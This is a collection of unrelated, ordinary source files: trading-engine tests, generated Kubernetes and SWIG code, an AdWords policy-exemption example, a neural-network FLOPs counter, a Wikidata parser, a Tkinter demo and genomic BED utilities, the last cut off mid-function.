price = 10
limit_orders = [LimitOrder(instrument_id=instrument_id,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders:
matching_engine.add_order(order)
    assert not matching_engine.order_books, "Test Failed: There should be no order books"
assert matching_engine.orders, "Test Failed: There should be orders"
assert len(
matching_engine.orders) == 10, "Test Failed: There should be 10 orders"
assert not matching_engine.processed_orders, "Test Failed: There should be no processed_orders"
pass
def test_matching_engine_can_add_and_process():
instrument_id = "AAPL"
quantity = 100
price = 10
limit_orders = [LimitOrder(instrument_id=instrument_id,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders:
matching_engine.add_order(order)
matching_engine.match()
order_book = matching_engine.order_books[instrument_id]
assert len(
matching_engine.order_books) == 1, "Test Failed: There should be 1 order book"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 10, "Test Failed: There should be 10 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
def test_matching_engine_can_add_and_match_multiple_instruments():
instrument_id_1 = "AAPL"
instrument_id_2 = "MSFT"
quantity = 100
price = 10
limit_orders_1 = [LimitOrder(instrument_id=instrument_id_1,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
limit_orders_2 = [LimitOrder(instrument_id=instrument_id_2,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders_1 + limit_orders_2:
matching_engine.add_order(order)
matching_engine.match()
order_book = matching_engine.order_books[instrument_id_1]
assert len(
matching_engine.order_books) == 2, "Test Failed: There should be 2 order books"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 20, "Test Failed: There should be 20 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
order_book = matching_engine.order_books[instrument_id_2]
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
def test_matching_engine_can_add_and_run_multiple_instruments():
instrument_id_1 = "AAPL"
instrument_id_2 = "MSFT"
quantity = 100
price = 10
limit_orders_1 = [LimitOrder(instrument_id=instrument_id_1,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
limit_orders_2 = [LimitOrder(instrument_id=instrument_id_2,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders_1 + limit_orders_2:
matching_engine.add_order(order)
matching_engine.run()
matching_engine.live = False
order_book = matching_engine.order_books[instrument_id_1]
assert len(
matching_engine.order_books) == 2, "Test Failed: There should be 2 order books"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 20, "Test Failed: There should be 20 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
order_book = matching_engine.order_books[instrument_id_2]
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
|
py | b40347ae71edc448aa9436f94c335b5c930ed2a3 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.9.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.apps_v1beta1_deployment_list import AppsV1beta1DeploymentList
class TestAppsV1beta1DeploymentList(unittest.TestCase):
""" AppsV1beta1DeploymentList unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testAppsV1beta1DeploymentList(self):
"""
Test AppsV1beta1DeploymentList
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.apps_v1beta1_deployment_list.AppsV1beta1DeploymentList()
pass
if __name__ == '__main__':
unittest.main()
|
py | b40347e30f2825a41bff1a8df0da1d8958671a4d | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
TEMPLATE_START = """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
html {
font-family: Arial,Helvetica,sans-serif;
background-color: white;
color: black;
}
table {
border-collapse: collapse;
empty-cells: show;
margin: 1em 0em;
border: 1px solid black;
}
th, td {
border: 1px solid black;
padding: 0.1em 0.2em;
height: 1.5em;
width: 12em;
}
td.colspan4, th.colspan4 {
width: 48em;
}
td.colspan3, th.colspan3 {
width: 36em;
}
td.colspan2, th.colspan2 {
width: 24em;
}
th {
background-color: rgb(192, 192, 192);
color: black;
height: 1.7em;
font-weight: bold;
text-align: center;
letter-spacing: 0.1em;
}
td.name {
background-color: rgb(240, 240, 240);
letter-spacing: 0.1em;
}
td.name, th.name {
width: 10em;
}
</style>
<title>%(NAME)s</title>
</head>
<body>
<h1>%(NAME)s</h1>
"""
TEMPLATE_END = """</body>
</html>
"""
|
bzl | b4034884fab059c132d374b36e46dda27f742b3f | load("//:import_external.bzl", import_external = "safe_wix_scala_maven_import_external")
def dependencies():
import_external(
name = "org_ow2_asm_asm_analysis",
artifact = "org.ow2.asm:asm-analysis:6.2.1",
artifact_sha256 = "4c9342c98e746e9c2d7f2cdc6896f7348317e9b1e5a6c591047fc8969def4b23",
srcjar_sha256 = "389c433efbf54b9c28416d68e763fd99dafe99b2469982d0aceb180b012ac2d9",
deps = [
"@org_ow2_asm_asm_tree"
],
)
import_external(
name = "org_ow2_asm_asm_tree",
artifact = "org.ow2.asm:asm-tree:6.2.1",
artifact_sha256 = "a520b54c7be4e07e533db8420ddf936fe8341ff56a5df255bab584478dd90aab",
srcjar_sha256 = "549a8d0825a18c4ccfe4a1cb78cb3b4105ce6f869646ef039f9a21077e18f619",
deps = [
"@org_ow2_asm_asm"
],
)
import_external(
name = "org_ow2_asm_asm_util",
artifact = "org.ow2.asm:asm-util:5.0.3",
artifact_sha256 = "2768edbfa2681b5077f08151de586a6d66b916703cda3ab297e58b41ae8f2362",
srcjar_sha256 = "1e9ee309d909b3dbf33291fcfd36c76adba4ed1215b8156c3ac61a774cc86bf1",
deps = [
"@org_ow2_asm_asm_tree"
],
)
import_external(
name = "org_ow2_asm_asm",
artifact = "org.ow2.asm:asm:6.2.1",
artifact_sha256 = "1460db6c33cc99c84e5cb30e46b017e4d1cc9a7fbc174101d6f84829bb64c085",
srcjar_sha256 = "e9d6ffabe190d726536d3d47ad7e80ca3d0a19a19b59a3b2b4701a339d5d9196",
)
|
py | b40349a47a7d5f8a2d5f0a44f5adbec2de087705 | import re
import sys
MODULE_REGEX = r'^[_a-zA-Z][_a-zA-Z0-9]+$'
module_name = '{{ cookiecutter.project_slug }}'
if not re.match(MODULE_REGEX, module_name):
print(
(
'ERROR: The project slug ({}) is not a valid Python module name. '
'Please do not use a - and use _ instead'
).format(module_name)
)
sys.exit(1)
|
py | b40349a926ddfb46e57307a278414ea2585c0de4 | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.8
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_tensorflow_wrap_interpreter_wrapper', [dirname(__file__)])
except ImportError:
import _tensorflow_wrap_interpreter_wrapper
return _tensorflow_wrap_interpreter_wrapper
if fp is not None:
try:
_mod = imp.load_module('_tensorflow_wrap_interpreter_wrapper', fp, pathname, description)
finally:
fp.close()
return _mod
_tensorflow_wrap_interpreter_wrapper = swig_import_helper()
del swig_import_helper
else:
import _tensorflow_wrap_interpreter_wrapper
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
class InterpreterWrapper(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, InterpreterWrapper, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, InterpreterWrapper, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_destroy__ = _tensorflow_wrap_interpreter_wrapper.delete_InterpreterWrapper
__del__ = lambda self: None
def AllocateTensors(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_AllocateTensors(self)
def Invoke(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_Invoke(self)
def InputIndices(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_InputIndices(self)
def OutputIndices(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_OutputIndices(self)
def ResizeInputTensor(self, i, value):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_ResizeInputTensor(self, i, value)
def NumTensors(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_NumTensors(self)
def TensorName(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorName(self, i)
def TensorType(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorType(self, i)
def TensorSize(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorSize(self, i)
def TensorQuantization(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorQuantization(self, i)
def SetTensor(self, i, value):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_SetTensor(self, i, value)
def GetTensor(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_GetTensor(self, i)
def ResetVariableTensors(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_ResetVariableTensors(self)
def tensor(self, base_object, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_tensor(self, base_object, i)
def ModifyGraphWithDelegate(self, delegate):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_ModifyGraphWithDelegate(self, delegate)
__swig_getmethods__["CreateWrapperCPPFromFile"] = lambda x: _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile
if _newclass:
CreateWrapperCPPFromFile = staticmethod(_tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile)
__swig_getmethods__["CreateWrapperCPPFromBuffer"] = lambda x: _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer
if _newclass:
CreateWrapperCPPFromBuffer = staticmethod(_tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer)
InterpreterWrapper_swigregister = _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_swigregister
InterpreterWrapper_swigregister(InterpreterWrapper)
def InterpreterWrapper_CreateWrapperCPPFromFile(*args):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile(*args)
InterpreterWrapper_CreateWrapperCPPFromFile = _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile
def InterpreterWrapper_CreateWrapperCPPFromBuffer(*args):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer(*args)
InterpreterWrapper_CreateWrapperCPPFromBuffer = _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer
# This file is compatible with both classic and new-style classes.
|
py | b4034b22dbdce1898aa072314fc167adf171dc6e | #!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example demonstrates how to handle policy violation errors.
To get ad groups, run get_ad_groups.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import suds
from googleads import adwords
AD_GROUP_ID = 'INSERT_AD_GROUP_ID_HERE'
def main(client, ad_group_id):
ad_group_ad_service = client.GetService('AdGroupAdService', 'v201702')
# Create expanded text ad that violates an exemptable policy.
exemptable_expanded_text_ad_operation = {
'operator': 'ADD',
'operand': {
'adGroupId': ad_group_id,
'ad': {
# The 'xsi_type' field allows you to specify the xsi:type of the
# object being created. It's only necessary when you must provide
# an explicit type that the client library can't infer.
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Mars Cruise!!!',
'headlinePart2': 'Best space cruise line.',
'description': 'Visit the Red Planet in style.',
'finalUrls': ['http://www.example.com']
}
}
}
# Create text ad that violates a non-exemptable policy.
non_exemptable_expanded_text_ad_operation = {
'operator': 'ADD',
'operand': {
'adGroupId': ad_group_id,
'ad': {
# The 'xsi_type' field allows you to specify the xsi:type of the
# object being created. It's only necessary when you must provide
# an explicit type that the client library can't infer.
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Mars Cruise with too long of a headline.',
'headlinePart2': 'Best space cruise line.',
'description': 'Visit the Red Planet in style.',
'finalUrls': ['http://www.example.com']
}
}
}
operations = [exemptable_expanded_text_ad_operation,
non_exemptable_expanded_text_ad_operation]
# Validate the ad.
try:
# Enable "validate only" to check for errors.
client.validate_only = True
ad_group_ad_service.mutate(operations)
print 'Validation successful, no errors returned.'
except suds.WebFault, e:
for error in e.fault.detail.ApiExceptionFault.errors:
# Get the index of the failed operation from the error's field path
# elements.
field_path_elements = error['fieldPathElements']
first_field_path_element = None
if field_path_elements:
first_field_path_element = field_path_elements[0]
# If the operation index is not present on the first error field path
# element, then there's no way to determine which operation to remove,
# so simply throw the exception.
if (not (first_field_path_element
and first_field_path_element['field'] == 'operations'
and first_field_path_element['index'])):
raise e
operation_index = first_field_path_element['index']
index = int(operation_index[0])
operation = operations[index]
if not HandleAPIError(error, operation):
# Set non-exemptable operation to None to mark for deletion.
print ('Removing operation with non-exemptable error at index %s.'
% operation_index)
operations[index] = None
# Remove the non-exemptable operations.
operations = [op for op in operations if op is not None]
# Add these ads. Disable "validate only" so the ads will get created.
client.validate_only = False
if operations:
response = ad_group_ad_service.mutate(operations)
if response and response['value']:
ads = response['value']
print 'Added %s ad(s) to ad group %s.' % (len(ads), ad_group_id)
for ad in ads:
print (' Ad id is %s, type is %s and status is \'%s\'.' %
(ad['ad']['id'], ad['ad']['Ad.Type'], ad['status']))
else:
print 'No ads were added.'
def HandleAPIError(error, operation):
"""Makes an exemption for exemptable PolicyViolationErrors.
Args:
error: the error associated with the given operation.
operation: the operation associated with the given error.
Returns:
A boolean that is True if the given error was an exemptable
PolicyViolationError; otherwise, returns False.
"""
is_exemptable = False
# Determine if the operation can be resubmitted with an exemption request.
if error['ApiError.Type'] == 'PolicyViolationError':
expanded_text_ad = operation['operand']['ad']
is_exemptable = (error['isExemptable'] if 'isExemptable' in error else
False)
print ('Ad with headline "%s - %s" violated %s policy "%s".' %
(expanded_text_ad['headlinePart1'],
expanded_text_ad['headlinePart2'],
'exemptable' if is_exemptable else 'non-exemptable',
error['externalPolicyName']))
if is_exemptable:
# Add exemption request to the operation.
print ('Adding exemption request for policy name \'%s\' on text \'%s\'.'
% (error['key']['policyName'], error['key']['violatingText']))
if 'exemptionRequests' not in operation:
operation['exemptionRequests'] = []
operation['exemptionRequests'].append({'key': error['key']})
return is_exemptable
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, AD_GROUP_ID)
|
py | b4034b4c4fa987a8e6ad0ebee3bf001bde3db0c8 | import numpy as np
# Calculate FLOPs of NN
tanhflops = 15
reluflops = 2
sineflops = 15
def matmulf(n,m,k, isparallel):
if isparallel:
return 2*m-1
else:
return (2*m-1)*n*k
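# Editor-added worked example (hedged): with the convention above,
# matmulf(3, 4, 1, False) == (2*4 - 1) * 3 * 1 == 21, while the parallel count
# matmulf(3, 4, 1, True) collapses to 2*4 - 1 == 7.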
def vecaddf(n, isparallel):
if isparallel:
return 1
else:
return n
def actfunc(n, afunc, isparallel):
if isparallel:
return afunc
else:
return n*afunc
def layerf(n, m, afunc, isparallel):
# weight matrix: m times n
# (m, n)*(n, 1)
flops = 0
flops += matmulf(n, m, 1, isparallel)
flops += vecaddf(m, isparallel)
flops += actfunc(m, afunc, isparallel)
return flops
def ffdnnf(nnarc, afunc, isparallel):
flops = 0
prevlayer = nnarc[0]
for width in nnarc[1:]:
flops += layerf(prevlayer, width, afunc, isparallel)
prevlayer = width
return flops
def p2f(n, isparallel):
if isparallel:
return 5
else:
return 13*n
def paramf(n, nnarc, afunc, isparallel):
flops = 0
prevlayer = 2
for width in nnarc:
flops += layerf(prevlayer, n*width, afunc, isparallel)
prevlayer = n*width
flops += layerf(prevlayer, n, afunc, isparallel)
return flops
def nnf(NNarc, nnafunc, paramafunc, isparallel):
flops = 0
ffdlayers = []
for layer in NNarc:
ffdlayers.append(layer[0])
flops += ffdnnf(ffdlayers, nnafunc, isparallel)
paramflops = 0
prevwidth = 0
for layer in NNarc[1:]:
matrixn = prevwidth*layer[0]
biasn = layer[0]
type_ = layer[1]
if type_ == 'p2':
flps = p2f(matrixn + biasn, isparallel)
if isparallel and paramflops < flps:
paramflops = flps
elif not isparallel:
paramflops += flps
else:
flps = paramf(matrixn, type_, paramafunc, isparallel)
if isparallel and paramflops < flps:
paramflops = flps
elif not isparallel:
paramflops += flps
flps = 0
flps = paramf(biasn, type_, paramafunc, isparallel)
if isparallel and paramflops < flps:
paramflops = flps
elif not isparallel:
paramflops += flps
flps = 0
flops += paramflops
return flops
nnarc = [[1, 'input layer'],
[5, [2, 4, 4, 2]],
[10, [2, 4, 4, 2]],
[15, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[15, [2, 4, 4, 2]],
[10, [2, 4, 4, 2]],
[5, [2, 4, 4, 2]],
[1, 'p2']]
print(nnf(nnarc, tanhflops, reluflops, True), nnf(nnarc, tanhflops, reluflops, False))
|
py | b4034c0d169d0dced0db7514248838538b856695 | import random
class Service():
# returns a random number
# NOTE: You do not need to modify this method!
# Mock it instead
    def bad_random(self):
file = open('/Users/dchui1/datafile', 'r')
numberStrings = file.readlines()
numbers = [int(x) for x in numberStrings]
return random.randint(0, len(numberStrings)-1)
# Test this
def divide(self, y):
return self.bad_random() / y
# Test this
def abs_plus(self, x):
return abs(x) + 1
# Test this
def complicated_function(self, x):
return self.divide(x), self.bad_random() % 2
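# Editor-added sketch (hedged): one way to test divide() while mocking
# bad_random, as the NOTE above suggests. Uses the standard-library
# unittest.mock (Python 3); the expected value follows from 10 / 5.
def _example_test_divide():
    from unittest.mock import patch
    svc = Service()
    with patch.object(Service, 'bad_random', return_value=10):
        assert svc.divide(5) == 2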
|
py | b4034cb1ae9782ce15c119a52ddf5b31aa28fccc | # coding: utf-8
from __future__ import unicode_literals
import gzip
import json
import logging
import datetime
logger = logging.getLogger(__name__)
def read_wikidata_entities_json(wikidata_file, limit=None, to_print=False, lang="en", parse_descriptions=True):
    # Read the JSON wiki data and parse out the entities. Takes about 7.5 hours to parse 55M lines.
# get latest-all.json.bz2 from https://dumps.wikimedia.org/wikidatawiki/entities/
site_filter = '{}wiki'.format(lang)
# properties filter (currently disabled to get ALL data)
prop_filter = dict()
# prop_filter = {'P31': {'Q5', 'Q15632617'}} # currently defined as OR: one property suffices to be selected
title_to_id = dict()
id_to_descr = dict()
# parse appropriate fields - depending on what we need in the KB
parse_properties = False
parse_sitelinks = True
parse_labels = False
parse_aliases = False
parse_claims = False
with gzip.open(wikidata_file, mode='rb') as file:
for cnt, line in enumerate(file):
if limit and cnt >= limit:
break
if cnt % 500000 == 0:
logger.info("processed {} lines of WikiData dump".format(cnt))
clean_line = line.strip()
if clean_line.endswith(b","):
clean_line = clean_line[:-1]
if len(clean_line) > 1:
obj = json.loads(clean_line)
entry_type = obj["type"]
if entry_type == "item":
# filtering records on their properties (currently disabled to get ALL data)
# keep = False
keep = True
claims = obj["claims"]
if parse_claims:
for prop, value_set in prop_filter.items():
claim_property = claims.get(prop, None)
if claim_property:
for cp in claim_property:
cp_id = (
cp["mainsnak"]
.get("datavalue", {})
.get("value", {})
.get("id")
)
cp_rank = cp["rank"]
if cp_rank != "deprecated" and cp_id in value_set:
keep = True
if keep:
unique_id = obj["id"]
if to_print:
print("ID:", unique_id)
print("type:", entry_type)
# parsing all properties that refer to other entities
if parse_properties:
for prop, claim_property in claims.items():
cp_dicts = [
cp["mainsnak"]["datavalue"].get("value")
for cp in claim_property
if cp["mainsnak"].get("datavalue")
]
cp_values = [
cp_dict.get("id")
for cp_dict in cp_dicts
if isinstance(cp_dict, dict)
if cp_dict.get("id") is not None
]
if cp_values:
if to_print:
print("prop:", prop, cp_values)
found_link = False
if parse_sitelinks:
site_value = obj["sitelinks"].get(site_filter, None)
if site_value:
site = site_value["title"]
if to_print:
print(site_filter, ":", site)
title_to_id[site] = unique_id
found_link = True
if parse_labels:
labels = obj["labels"]
if labels:
lang_label = labels.get(lang, None)
if lang_label:
if to_print:
print(
"label (" + lang + "):", lang_label["value"]
)
if found_link and parse_descriptions:
descriptions = obj["descriptions"]
if descriptions:
lang_descr = descriptions.get(lang, None)
if lang_descr:
if to_print:
print(
"description (" + lang + "):",
lang_descr["value"],
)
id_to_descr[unique_id] = lang_descr["value"]
if parse_aliases:
aliases = obj["aliases"]
if aliases:
lang_aliases = aliases.get(lang, None)
if lang_aliases:
for item in lang_aliases:
if to_print:
print(
"alias (" + lang + "):", item["value"]
)
if to_print:
print()
return title_to_id, id_to_descr
def write_entity_files(entity_def_output, title_to_id):
with entity_def_output.open("w", encoding="utf8") as id_file:
id_file.write("WP_title" + "|" + "WD_id" + "\n")
for title, qid in title_to_id.items():
id_file.write(title + "|" + str(qid) + "\n")
def write_entity_description_files(entity_descr_output, id_to_descr):
with entity_descr_output.open("w", encoding="utf8") as descr_file:
descr_file.write("WD_id" + "|" + "description" + "\n")
for qid, descr in id_to_descr.items():
descr_file.write(str(qid) + "|" + descr + "\n")
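# Editor-added sketch (hedged): putting the helpers above together on a small
# slice of a dump. The file names and the limit are illustrative, and pathlib
# (Python 3) is assumed because the writers call .open() on their arguments.
def _example_build_kb_inputs():
    from pathlib import Path
    title_to_id, id_to_descr = read_wikidata_entities_json(
        "latest-all.json.gz", limit=100000, lang="en")
    write_entity_files(Path("entity_defs.csv"), title_to_id)
    write_entity_description_files(Path("entity_descriptions.csv"), id_to_descr)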
|
py | b4034d19445033b7ea3b056304eba4c0c35a1fb2 | from tkinter import *
# This file shows how to trap the killing of a window
# when the user uses window manager menus (typ. upper left hand corner
# menu in the decoration border).
### ******* this isn't really called -- read the comments
def my_delete_callback():
print("whoops -- tried to delete me!")
class Test(Frame):
def deathHandler(self, event):
print(self, "is now getting nuked. performing some save here....")
def createWidgets(self):
# a hello button
self.hi_there = Button(self, text='Hello')
self.hi_there.pack(side=LEFT)
def __init__(self, master=None):
Frame.__init__(self, master)
Pack.config(self)
self.createWidgets()
###
### PREVENT WM kills from happening
###
# the docs would have you do this:
# self.master.protocol("WM_DELETE_WINDOW", my_delete_callback)
# unfortunately, some window managers will not send this request to a window.
# the "protocol" function seems incapable of trapping these "aggressive" window kills.
        # this line of code catches everything, though. The window is deleted, but you have a chance
# of cleaning up first.
self.bind_all("<Destroy>", self.deathHandler)
test = Test()
test.mainloop()
|
py | b4034d839090100ed19ff7e5814d748fc844159c | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import subprocess
import re
import os
import six
import numpy as np
import pandas as pd
from .region import parse_region
from ._process import tsv
def atoi(s):
return int(s.replace(',', ''))
def natsort_key(s, _NS_REGEX=re.compile(r'(\d+)', re.U)):
return tuple([int(x) if x.isdigit() else x for x in _NS_REGEX.split(s) if x])
def natsorted(iterable):
return sorted(iterable, key=natsort_key)
def argnatsort(array):
array = np.asarray(array)
if not len(array): return np.array([], dtype=int)
cols = tuple(zip(*(natsort_key(x) for x in array)))
    return np.lexsort(cols[::-1])  # np.lexsort treats its last key as the primary sort key, hence the reversal
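# Quick illustration of the natural-sort helpers above: natsorted() orders
# 'chr2' before 'chr10' (plain sorted() would not), and argnatsort() returns
# the permutation that natural-sorts an array.
def _natsort_example():
    names = ['chr10', 'chr2', 'chr1', 'chrX']
    assert natsorted(names) == ['chr1', 'chr2', 'chr10', 'chrX']
    order = argnatsort(np.array(['chr10', 'chr2', 'chr1']))
    assert list(order) == [2, 1, 0]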
def _find_block_span(arr, val):
    '''Find the first and the last occurrence + 1 of the value in the array.
'''
# it can be done via bisection, but for now BRUTE FORCE
block_idxs = np.where(arr==val)[0]
lo, hi = block_idxs[0], block_idxs[-1]+1
return lo,hi
def bedbisect(bedf, region):
"""Returns the span of a block of rows corresponding to
the genomic region.
Rows must be sorted by `start` and `end`;
`chrom` must be grouped, but does not have to be sorted.
"""
chrom, start, end = parse_region(region)
lo, hi = _find_block_span(bedf.chrom.values, chrom)
lo += bedf['end'].values[lo:hi].searchsorted(start, side='right')
if end is not None:
hi = lo + bedf['start'].values[lo:hi].searchsorted(end, side='left')
# else:
    # hi = None  # this only works when bedf is a groupby object
return lo, hi
def bedslice(bedf, region):
"""Returns a block of rows corresponding to the genomic region.
Rows must be sorted by `start` and `end`;
`chrom` must be grouped, but does not have to be sorted.
"""
lo, hi = bedbisect(bedf, region)
return bedf.iloc[lo:hi]
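# Minimal sketch of bedslice() on a tiny sorted BED-like frame.  The region is
# given as a (chrom, start, end) tuple here, assuming parse_region accepts
# tuples as well as "chrom:start-end" strings.
def _bedslice_example():
    bed = pd.DataFrame({
        'chrom': ['chr1', 'chr1', 'chr1', 'chr2'],
        'start': [0, 10, 20, 0],
        'end': [10, 20, 30, 10],
    })
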